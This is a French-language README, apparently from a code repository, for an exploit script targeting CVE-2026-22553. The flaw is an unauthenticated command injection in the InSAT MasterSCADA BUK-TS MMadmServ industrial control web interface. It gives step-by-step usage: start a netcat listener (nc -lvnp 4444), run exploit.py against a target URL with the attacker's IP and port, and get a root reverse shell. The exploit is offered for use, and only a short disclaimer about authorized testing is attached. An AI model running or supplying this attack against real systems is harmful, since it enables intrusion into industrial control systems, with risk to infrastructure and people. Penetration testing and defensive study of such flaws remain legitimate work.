
Exploit d'injection de commandes OS non authentifiée pour l'interface web InSAT MasterSCADA BUK-TS MMadmServ. Fournit un reverse shell avec privilèges root via une requête HTTP POST. CVSS 9.8 critique.
CVE-2026-22553 | CVSS 9.8 Critique| Auteur de l'exploit : Mohammed Idrees Banyamer
InSAT MasterSCADA BUK-TS présente une vulnérabilité d'injection de commandes système sans authentification dans l'interface web MMadmServ. Cette faille permet à un attaquant distant d'obtenir une exécution de code à distance (RCE) complète sans aucune authentification.
flowchart TD
A[Attacker] -->|HTTP POST Request| B[MMadmServ Web Interface]
B -->|Unauthenticated| C[Vulnerable Parameter]
C -->|OS Command Injection| D[Command Execution on Target Server]
D -->|Reverse Shell| E[Attacker's Listener\nnc -lvnp <port>]
style A fill:#ff4d4d,stroke:#fff
style E fill:#4dff88,stroke:#fff
python3 exploit.py <target_url> --lhost <your_ip> --lport <your_port>
python3 exploit.py http://192.168.1.50:8080 --lhost 192.168.1.100 --lport 4444
| Option | Description |
|---|---|
target | URL cible (ex. http://ip:port) |
--lhost | Votre adresse IP (reverse shell) |
--lport | Votre port d'écoute |
Démarrez un listener sur votre machine :
nc -lvnp 4444
Exécutez l'exploit :
python3 exploit.py http://target-ip:port --lhost your-ip --lport 4444
Obtenez un reverse shell avec les privilèges root/système.
Cet exploit est fourni à des fins éducatives et de tests d'intrusion autorisés uniquement.
Toute utilisation non autorisée contre des systèmes qui ne vous appartiennent pas est illégale et peut violer les lois internationales.
L'auteur décline toute responsabilité en cas d'utilisation abusive.
Mohammed Idrees Banyamer
Mettez une étoile ⭐ à ce dépôt si vous l'avez trouvé utile !